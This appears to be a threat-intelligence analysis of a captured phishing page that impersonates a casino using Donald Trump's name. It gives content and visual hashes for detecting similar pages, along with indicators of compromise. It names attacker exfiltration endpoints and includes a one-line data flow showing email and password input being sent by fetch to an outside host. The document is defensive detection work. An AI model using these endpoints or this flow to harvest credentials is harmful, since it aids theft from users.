Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
| CONTENT TLSH | T16CE229B4A230D735B1C247E8DA6429287A5FE1DDD7C695B4E388AF11B0D6CE8D8250CB |
| CONTENT ssdeep | 384:4r/aJcuvnQRvRhiXkdvNTDhPhLxeAxeDWNW1Tp34PxeeJEmuW3As0yRW8Md:4r/aJcuvnghhPhleMeDGCSPxeeWmHxW |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
| VISUAL pHash | c73338cc783e694c |
| VISUAL aHash | 006660307078b690 |
| VISUAL dHash | 4ccccac3e5e46431 |
| VISUAL wHash | a0666630787ebf98 |
| VISUAL colorHash | 38206000000 |
| VISUAL cropResistant | 85858a88da9a78fa,100c323232320810,4ccccac3e5e46431 |
• Threat: Phishing
• Target: Unsuspecting users
• Method: Brand impersonation and reward scam
• Exfil: wss://gambler-work.com/api/ws
• Indicators: Recently registered domain, domain unrelated to the brand, use of the brand name, JavaScript obfuscation, form submission.
• Risk: High
The attacker impersonates a casino, using the name of Donald Trump to run a deceptive reward campaign. The goal is to trick the user into registering and providing sensitive information, such as an email address and password, in order to access the rewards.
The website leverages the image of Donald Trump and the lure of 'free rewards' to gain trust and deceive victims.
User fills <input name=email> → signalsFBEventsExtractFromInputs() → fetch('https://trumpcasino.us/api/exfiltrate') → User data sent
Pages with identical visual appearance (based on perceptual hash)